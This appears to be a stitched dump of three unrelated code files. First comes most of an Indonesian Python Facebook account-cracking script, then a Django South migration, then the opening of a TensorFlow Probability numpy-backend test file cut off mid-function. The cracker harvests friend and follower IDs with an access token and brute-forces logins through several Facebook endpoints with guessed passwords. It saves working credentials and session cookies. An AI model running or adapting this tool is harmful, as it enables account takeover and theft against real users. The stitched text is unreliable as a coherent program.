a = json.loads(otw.text)
nama = a['name']
zedd = open("token.txt", 'w')
zedd.write(kontol)
zedd.close()
menu()
except KeyError:
print("[x] Token Salah")
time.sleep(1.7)
login()
except requests.exceptions.SSLError:
exit('[x] Koneksi Error')
### USERAGENT MANUAL
def user():
if ___khamdihi___ not in '___my___frinds___the___best':
os.system('clear');semangath()
print('[*] Makanya jangan di ganti bang')
print('[+] Wenak mau rekode gagal enak ":)');sys.exit()
else:pass
ajg = raw_input("[?] masukan ua : ")
if ajg in[""]:
login()
else:
try:
zedd = open('ua.txt', 'w')
zedd.write(ajg)
zedd.close()
print("[✓] berhasil mengganti ua")
raw_input("[*] tekan enter untuk kembali ke menu")
login()
except KeyError:
exit()
def menu():
if ____rekode____ not in '___hayu___mau___rekodeya___':
os.system('clear');semangat()
print('[*] Ops eror yah suhu ')
print('[!] Makanya jangan di rubah suhu ');sys.exit()
else:pass
global token
os.system('clear')
try:
kontol = open('token.txt', 'r').read()
otw = requests.get('https://graph.facebook.com/me/?access_token=' + kontol)
a = json.loads(otw.text)
nama = a['name']
uid = a['id']
ttl = a['birthday']
except (KeyError, IOError):
os.system('clear')
print("\n %s[!] token kadaluwarsa!"%(P));time.sleep(2)
os.system('rm -f token.txt')
login()
except requests.exceptions.ConnectionError:
exit(" %s[!] anda tidak terhubung ke internet!"%(M))
semangat()
___parah___(AUTHOR_SCRIPT,PENGGUNA_SCRIPT)
jalan('[+] selamat datang %s '%(nama))
print(' ')
print('[+] ID Kamu : '+(uid));time.sleep(0.1)
print('[+] Ttl Kamu : '+(ttl));time.sleep(0.1)
print('[+] Kamu masuk pada : '+(tanggal));time.sleep(0.1)
print('\n[1] Crack dari publik/teman');time.sleep(0.1)
print('[2] Crack dari followers');time.sleep(0.1)
print('[3] Crack facebook massal ');time.sleep(0.1)
print('[4] Crack akun baru');time.sleep(0.1)
print('[5] Crack akun old/lama');time.sleep(0.1)
print('[6] Get data² target');time.sleep(0.1)
print('[7] Seting user-agent');time.sleep(0.1)
print('[8] Cek opsi chekpoint');time.sleep(0.1)
print('[9] Cek hasil');time.sleep(0.1)
print('[L] Lapor bug');time.sleep(0.1)
print('[0] Keluar ngentod\n');time.sleep(0.1)
___mmk___ = raw_input('[?] pilih menu : ');time.sleep(0.1)
if ___mmk___ in ['',' ', '']:
print('\n[*] Kasian masih kecil matanya buram')
___dihiXD___ = raw_input('[ Enter mas maaf bercanda kok ] ');menu()
elif ___mmk___ in ['1','01']:
___publik___() #
__metode__()
elif ___mmk___ in ['2','02']:
follo() #
__metode__()
elif ___mmk___ in ['3','03']:
___massal___() #
__metode__()
elif ___mmk___ in ['4','04']:
___fbbaru() #
__metode()
elif ___mmk___ in ['5','05']:
___fblama() #
__metode__()
elif ___mmk___ in ['6','06']:
jalan('[*] Maaf menu ini non aktif');menu() #
elif ___mmk___ in ['7','07']:
ua() #
elif ___mmk___ in ['8','08']:
opsi()
elif ___mmk___ in ['9','09']:
hasil()
elif ___mmk___ in ['0','00']:
os.system('rm -rf token.txt');exit() #
elif ___mmk___ in ['l','L']:
os.system('xdg-open https://wa.me/qr/VOPTEUBSWABNH1')
menu()
else:
menu()
def hasil():
print('+──────────────────────────────────────────+')
print('[1]. lihat hasil crack OK ')
print('[2]. lihat hasil crack CP ')
print('+──────────────────────────────────────────+')
anjg = raw_input('[?] pilih : ')
if anjg == '':
menu()
elif anjg == "1":
dirs = os.listdir("OK")
print('+──────────────────────────────────────────+')
for file in dirs:
print("[*] "+file)
try:
print('+──────────────────────────────────────────+')
file = raw_input("[?] file : ")
if file == "":
menu()
totalok = open("OK/%s"%(file)).read().splitlines()
except IOError:
exit("[!] file %s tidak tersedia"%(file))
print('──────────────────────────────────────────')
os.system("cat OK/%s"%(file))
print('──────────────────────────────────────────')
input("[*] tekan enter untuk kembali ke menu")
menu()
elif anjg == "2":
dirs = os.listdir("CP")
print('──────────────────────────────────────────')
for file in dirs:
print("[*] "+file)
try:
print('──────────────────────────────────────────')
file = raw_input("[?] file : ")
if file == "":
menu()
totalcp = open("CP/%s"%(file)).read().splitlines()
except IOError:
exit("[!] file %s tidak tersedia"%(file))
print('──────────────────────────────────────────')
os.system("cat CP/%s"%(file))
print('──────────────────────────────────────────')
raw_input("[*] tekan enter untuk kembali ke menu ")
menu()
else:
menu()
def opsi():
dirs = os.listdir("CP")
for file in dirs:
print("[*] CP/"+file)
print('+──────────────────────────────────────────+')
files = raw_input("[?] file : ")
if files == "":
menu()
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\n[!] nama file %s tidak tersedia"%(files))
ubahpw()
print('\n[!] anda bisa mematikan data selular untuk menjeda proses cek')
print('+──────────────────────────────────────────+')
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print("[+] cek : %s%s%s"%(K,kontol.replace(" * --> ",""),N))
try:
cek_opsi(titid[0].replace(" * --> ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
print('+──────────────────────────────────────────+')
print("\n[!] cek akun sudah selesai...")
input("[*] tekan enter untuk kembali ke menu ")
time.sleep(1)
menu()
def ua():
if ___khamdihi___ not in '___my___frinds___the___best___':
os.system('clear');semangath()
print('[*] Makanya jangan di ganti bang')
print('[+] Wenak mau rekode gagal enak')
else:pass
ajg = raw_input("[?] masukan ua : ")
if ajg in[""]:
menu()
else:
try:
zedd = open('ua.txt', 'w')
zedd.write(ajg)
zedd.close()
print("[✓] berhasil mengganti ua")
raw_input("[*] tekan enter untuk kembali")
menu()
except KeyError:
exit()
def follo():
global token
try:
kontol = open("token.txt", "r").read()
except IOError:
exit(" [!] token kadaluwarsa")
print("[*] Type 'me' jika ingin crack dari pengikut sendiri")
idt = raw_input("[!] masukan id atau username : ")
try:
for i in requests.get("https://graph.facebook.com/%s/subscribers?limit=5000&access_token=%s"%(idt, kontol)).json()["data"]:
uid = i["id"]
nama = i["name"]
id.append(uid+"<=>"+nama)
except KeyError:
exit(" [!] akun tidak tersedia atau list teman private")
print("[+] total id : %s%s%s"%(M,len(id),N))
def ___fbbaru():
x = 11111111111
xx = 77777777777
idx = "5000"
limit = int(raw_input("[•] Masukan limit id (cth 5000): "))
try:
for n in range(limit):
_ = random.randint(x,xx)
__ = idx
id.append(__+"<=>"+str(_))
except KeyError:
exit('[!] Kayaknya ada yang eror kek otak lu')
print("[+] total id : %s%s%s"%(M,len(id),N))
def ___publik___():
global token
try:
kontol = open("token.txt", "r").read()
except IOError:
exit("[!] token kadaluwarsa")
time.sleep (0.01)
print
jalan("[+] Ketik [ me ] jika ingin crack from teman")
time.sleep (0.01)
idt = raw_input("[?] Masukan id : ")
try:
for i in requests.get("https://graph.facebook.com/%s/friends?access_token=%s"%(idt, kontol)).json()["data"]:
id.append(i["id"]+"<=>"+i["name"])
except KeyError:
exit("[!] Id tidak publik")
print("[✓] Total id : %s%s%s"%(M,len(id),N))
def ___fblama():
x = 111111111
xx = 999999999
idx = "5000"
limit = int(raw_input("[+] Masukan limit id (cth 5000): "))
try:
for n in range(limit):
_ = random.randint(x,xx)
__ = idx
id.append(__+"<=>"+str(_))
except KeyError:
exit('[!] Id privat/script lagi eror kek otak lu')
print("[!] total id : %s%s%s"%(P,len(id),N))
def ___massal___():
if ____rekode____ not in '___hayu___mau___rekodeya___':
print('[×] Makanya jangan di ganti ngentod');sys.exit()
else:pass
global token
try:
token = open("token.txt", "r").read()
except IOError:
exit(" [!] token kadaluwarsa")
try:
tanya_total = int(raw_input("[?] Masukan jumlah id target : "))
except:tanya_total=1
print("[×] Type 'me' jika ingin crack dari daftar teman")
for t in range(tanya_total):
t +=1
idt = raw_input("[?] id target %s : "%(t))
try:
for i in requests.get("https://graph.facebook.com/%s/friends?access_token=%s"%(idt, token)).json()["data"]:
uid = i["id"]
nama = i["name"]
id.append(uid+"<=>"+nama)
except KeyError:
print("[!] Akun privat/id kamu slaah")
print("[+] total id : %s%s%s"%(P,len(id),N))
def __metode__():
time.sleep(2)
print('\n[1] Metode b-api | crack fast')
print('[2] Metode mbasic | crack selow')
print('[3] Metode mobile | rekomendasi')
print('[0] Jika id = 0 kembali aja ke menu\n')
dihi = raw_input('[?] Metode chose : ')
print(' ')
if dihi =='':
print('[!] Pilih salah satu kontol')
time.sleep(2);__metode__()
elif dihi in ['1','01']:
print('[*] Hasil ok tersimpan di ok.txt')
print('[*] Hasil cp tersimpan di cp.txt\n')
with ThreadPoolExecutor(max_workers=30) as fall:
for user in id:
uid, name = user.split("<=>")
nam = name.split(' ')
if len(name) == 3 or len(name) == 4 or len(name) == 5 or len(name) == 6:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
else:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
fall.submit(bapi, user)
exit("\n\n [!] crack selesai, salin terlebih dahulu")
elif dihi in ['2','02']:
print('[*] Hasil ok tersimpan di ok.txt')
print('[*] Hasil cp tersimpan di cp.txt\n')
with ThreadPoolExecutor(max_workers=30) as fall:
for user in id:
uid, name = user.split("<=>")
nam = name.split(' ')
if len(name) == 3 or len(name) == 4 or len(name) == 5 or len(name) == 6:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
else:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
fall.submit(mbasic, user)
exit("\n\n\x1b[1;97m [#] crack selesai, salin hasilnya")
elif dihi in ['3','03']:
print('[*] Hasil ok tersimpan di ok.txt')
print('[*] Hasil cp tersimpan di cp.txt\n')
with ThreadPoolExecutor(max_workers=30) as fall:
for user in id:
uid, name = user.split("<=>")
nam = name.split(' ')
if len(name) == 3 or len(name) == 4 or len(name) == 5 or len(name) == 6:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
else:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
fall.submit(mobile,user)
exit("\n\n [#] \x1b[1;97mcrack selesai...")
elif dihi in ['0','00']:
menu()
else:
__metode__()
def mobile(user):
try:
ua = open("ua", "r").read()
except IOError:
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
global loop, token
sys.stdout.write(
"\r[Crack] (%s) - (%s) OK:-%s - CP:-%s "%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
uid, name = user.split("<=>")
if len(name)>=6:
pwx = [ name, name+"123", name+"1234", name+"12345" ]
elif len(name)<=2:
pwx = [ name+"123", name+"1234", name+"12345" ]
elif len(name)<=3:
pwx = [ name+"123", name+"12345" ]
else:
pwx = [ name+"123", name+"12345" ]
try:
for pw in pwx:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = bs4.BeautifulSoup(p.text, 'html.parser')
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
gaaa = ses.post("https://m.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Ftouch.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print("\r\x1b[1;92m[OK] %s|%s|%s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("OK/%s.txt"%(tanggal),"a").write(" [OK] %s|%s\n"%(uid, pw))
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
print("\r\033[0;95m[CP] %s|%s\033[0;91m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("CP/%s.txt"%(tanggal),"a").write(" [CP] %s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
continue
loop += 1
except:
pass
def bapi(user):
try:
ua = open(".ua", "r").read()
except IOError:
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
global loop, token
sys.stdout.write(
"\r[Crack] %s/%s -> OK:-%s - CP:-%s "%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
uid, name = user.split("<=>")
if len(name)>=6:
pwx = [ name, name+"123", name+"1234", name+"12345" ]
elif len(name)<=2:
pwx = [ name+"123", name+"1234", name+"12345" ]
elif len(name)<=3:
pwx = [ name+"123", name+"12345" ]
else:
pwx = [ name+"123", name+"12345" ]
try:
for pw in pwx:
pw = pw.lower()
ses = requests.Session()
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
send = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_)
if "session_key" in send.text and "EAAA" in send.text:
print("\r\x1b[1;92m[OK] %s|%s|%s\033[0;97m"%(uid, pw, send.json()["access_token"]))
ok.append("%s|%s"%(uid, pw))
open("OK/%s.txt"%(tBilall),"a").write(" + %s|%s\n"%(uid, pw))
break
continue
elif "www.facebook.com" in send.json()["error_msg"]:
print("\r\x1b[1;92m[CP] %s|%s\033[0;92m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("CP/%s.txt"%(tBilall),"a").write(" + %s|%s\n"%(uid, pw))
break
continue
loop += 1
except:
pass
def mbasic(user):
try:
ua = open(".ua", "r").read()
except IOError:
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
global loop, token
sys.stdout.write(
"\r[Crack] %s/%s -> OK:-%s - CP:-%s "%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
uid, name = user.split("<=>")
if len(name)>=6:
pwx = [ name, name+"123", name+"1234", name+"12345" ]
elif len(name)<=2:
pwx = [ name+"123", name+"1234", name+"12345" ]
elif len(name)<=3:
pwx = [ name+"123", name+"12345" ]
else:
pwx = [ name+"123", name+"12345" ]
try:
for pw in pwx:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
gaaa = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print("\r\x1b[1;92m[OK] %s|%s|%s\033[0;95m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("OK/%s.txt"%(tanggal),"a").write(" [OK] %s|%s\n"%(uid, pw))
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
print("\r\x1b[1;92m[CP] %s|%s\033[0;96m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("CP/%s.txt"%(tanggal),"a").write(" [CP] %s|%s\n"%(uid, pw))
break
continue
loop += 1
except:
pass
if __name__ == '__main__':
os.system('git pull')
os.system('clear')
jalan("\x1b[1;92m[✓] Suscribe chenel aku dulu ya bang ';(")
os.system('xdg-open https://youtube.com/channel/UCOqxx2kjYPypVct2l81Y1Jw')
___cek___(___dihi___,___khaa___,___rekode___)
| 36.693793 | 565 | 0.569222 |
85cbb1cfca0c56e44ca33b65287235a4cb9a78c9 | 5,872 | py | Python | post_office/south_migrations/0014_auto__add_field_backendaccess_backend_class.py | carrerasrodrigo/django-post_office | 0257a39f9f2d20c1a42c58e8fd4dfaf591221132 | [
"MIT"
] | null | null | null | post_office/south_migrations/0014_auto__add_field_backendaccess_backend_class.py | carrerasrodrigo/django-post_office | 0257a39f9f2d20c1a42c58e8fd4dfaf591221132 | [
"MIT"
] | null | null | null | post_office/south_migrations/0014_auto__add_field_backendaccess_backend_class.py | carrerasrodrigo/django-post_office | 0257a39f9f2d20c1a42c58e8fd4dfaf591221132 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'BackendAccess.backend_class'
db.add_column(u'post_office_backendaccess', 'backend_class',
self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'BackendAccess.backend_class'
db.delete_column(u'post_office_backendaccess', 'backend_class')
models = {
u'post_office.attachment': {
'Meta': {'object_name': 'Attachment'},
'emails': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'attachments'", 'symmetrical': 'False', 'to': u"orm['post_office.Email']"}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'post_office.backendaccess': {
'Meta': {'object_name': 'BackendAccess'},
'backend_class': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'host': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_time_sent': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'limit_min': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'port': ('django.db.models.fields.IntegerField', [], {}),
'total_sent_last_min': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'use_tsl': ('django.db.models.fields.BooleanField', [], {}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'post_office.email': {
'Meta': {'object_name': 'Email'},
'backend_access': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['post_office.BackendAccess']", 'null': 'True', 'blank': 'True'}),
'bcc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'cc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'context': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'from_email': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'headers': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'html_message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'scheduled_time': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'template': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['post_office.EmailTemplate']", 'null': 'True', 'blank': 'True'}),
'to': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
u'post_office.emailtemplate': {
'Meta': {'object_name': 'EmailTemplate'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'html_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'post_office.log': {
'Meta': {'object_name': 'Log'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['post_office.Email']"}),
'exception_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
}
}
complete_apps = ['post_office'] | 68.27907 | 172 | 0.566928 |
20ed3c4dfb1f1d2f7ff4e4991acde4ac548cb58d | 77,149 | py | Python | tensorflow_probability/python/internal/backend/numpy/numpy_test.py | mederrata/probability | bc6c411b0fbd83141f303f91a27343fe3c43a797 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/internal/backend/numpy/numpy_test.py | mederrata/probability | bc6c411b0fbd83141f303f91a27343fe3c43a797 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/internal/backend/numpy/numpy_test.py | mederrata/probability | bc6c411b0fbd83141f303f91a27343fe3c43a797 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for internal.backend.numpy."""
import functools
# Dependency imports
from absl import flags
from absl import logging
from absl.testing import parameterized
import hypothesis as hp
import hypothesis.extra.numpy as hnp
import hypothesis.strategies as hps
import mock
import numpy as np # Rewritten by script to import jax.numpy
import numpy as onp # pylint: disable=reimported
import scipy.special as scipy_special
import six
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import hypothesis_testlib as tfp_hps
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.internal.backend import numpy as nptf
from tensorflow_probability.python.internal.backend.numpy import functional_ops as np_pfor
import tensorflow_probability.substrates.numpy as tfp
from tensorflow.python.ops import parallel_for as tf_pfor # pylint: disable=g-direct-tensorflow-import
# Allows us to test low-level TF:XLA match.
flags.DEFINE_enum('test_mode', 'numpy', ['numpy', 'xla'],
'Set to `"xla"` to compare TF with TF-XLA. '
'Default compares tf to nptf.')
flags.DEFINE_bool('only_disabled', False, 'Only test disabled XLA tests')
flags.DEFINE_bool('use_tpu', False, 'Verifies numerics on TPU.')
flags.DEFINE_list('xla_disabled', [],
'List of endpoints to skip. Allows us per-device blocklists.')
FLAGS = flags.FLAGS
ALLOW_NAN = False
ALLOW_INFINITY = False
ALLOW_SUBNORMAL = False
JAX_MODE = False
NUMPY_MODE = not JAX_MODE
# pylint is unable to handle @hps.composite (e.g. complains "No value for
# argument 'batch_shape' in function call"), so disable this lint for the file.
# pylint: disable=no-value-for-parameter
class Kwargs(dict):
"""Sentinel to indicate a single item arg is actually a **kwargs."""
# See usage with raw_ops.MatrixDiagPartV2.
pass
def _add_jax_prng_key_as_seed():
import jax.random as jaxrand # pylint: disable=g-import-not-at-top
return dict(seed=jaxrand.PRNGKey(123))
def _getattr(obj, name):
names = name.split('.')
return functools.reduce(getattr, names, obj)
def _maybe_get_subnormal_kwarg(allow_subnormal=ALLOW_SUBNORMAL):
if hp.__version_info__ >= (6, 30):
return {'allow_subnormal': allow_subnormal}
return {}
class TestCase(dict):
"""`dict` object containing test strategies for a single function."""
def __init__(self, name, strategy_list, **kwargs):
self.name = name
tensorflow_function = kwargs.pop('tensorflow_function', None)
if not tensorflow_function:
tensorflow_function = _getattr(tf, name)
numpy_function = kwargs.pop('numpy_function', None)
if not numpy_function:
numpy_function = _getattr(
nptf,
name.replace('random.', 'random.stateless_'
).replace('random.stateless_gamma', 'random.gamma'))
super(TestCase, self).__init__(
testcase_name='_' + name.replace('.', '_'),
tensorflow_function=tensorflow_function,
numpy_function=numpy_function,
strategy_list=strategy_list,
name=name,
**kwargs)
def __repr__(self):
return 'TestCase(\'{}\', {})'.format(self.name, self['strategy_list'])
# Below we define several test strategies. Each describes the valid inputs for
# different TensorFlow and numpy functions. See hypothesis.readthedocs.io for
# mode detail.
@hps.composite
def floats(draw,
min_value=-1e16,
max_value=1e16,
allow_nan=ALLOW_NAN,
allow_infinity=ALLOW_INFINITY,
allow_subnormal=ALLOW_SUBNORMAL,
dtype=None):
if dtype is None:
dtype = np.float32 if FLAGS.use_tpu else np.float64
if min_value is not None:
min_value = onp.array(min_value, dtype=dtype).item()
if max_value is not None:
max_value = onp.array(max_value, dtype=dtype).item()
subnormal_kwarg = _maybe_get_subnormal_kwarg(allow_subnormal)
return draw(hps.floats(min_value=min_value,
max_value=max_value,
allow_nan=allow_nan,
allow_infinity=allow_infinity,
width=np.dtype(dtype).itemsize * 8,
**subnormal_kwarg))
def integers(min_value=-2**30, max_value=2**30):
return hps.integers(min_value, max_value)
def complex_numbers(min_magnitude=0.,
max_magnitude=1e16,
allow_nan=ALLOW_NAN,
allow_infinity=ALLOW_INFINITY,
dtype=np.complex64):
# TODO(jburnim): In the np.complex64 case, directly build np.complex64 values
# with Hypothesis instead of building np.complex128 and casting.
return hps.builds(
dtype,
hps.complex_numbers(
min_magnitude=min_magnitude,
max_magnitude=max_magnitude,
allow_nan=allow_nan,
allow_infinity=allow_infinity))
@hps.composite
def non_zero_floats(draw, *args, **kwargs):
return draw(floats(*args, **kwargs).filter(lambda x: np.all(x != 0.)))
positive_floats = functools.partial(floats, min_value=1e-6)
def shapes(min_dims=0, max_dims=4, min_side=1, max_side=5):
strategy = hnp.array_shapes(
min_dims=max(1, min_dims),
max_dims=max_dims,
min_side=min_side,
max_side=max_side)
if min_dims < 1:
strategy = hps.one_of(hps.just(()), strategy)
return strategy
def fft_shapes(fft_dim, max_fft_size=32):
sizes = [s for s in [2, 4, 8, 16, 32] if s <= max_fft_size]
return hps.tuples(
shapes(max_dims=2), # batch portion
hps.lists(min_size=fft_dim, max_size=fft_dim,
elements=hps.sampled_from(sizes))).map(
lambda t: t[0] + tuple(t[1]))
@hps.composite
def n_same_shape(draw, n, shape=shapes(), dtype=None, elements=None,
as_tuple=True, batch_shape=(), unique=False,
allow_nan=ALLOW_NAN):
if dtype is None:
dtype = np.float32 if FLAGS.use_tpu else np.float64
if elements is None:
if dtype in (np.float32, np.float64):
if allow_nan:
elements = floats(min_value=None, max_value=None,
allow_nan=allow_nan, dtype=dtype)
else:
elements = floats(dtype=dtype)
elif dtype in (np.int32, np.int64):
elements = integers()
elif dtype in (np.complex64, np.complex128):
elements = complex_numbers(dtype=dtype)
elif dtype == np.bool_:
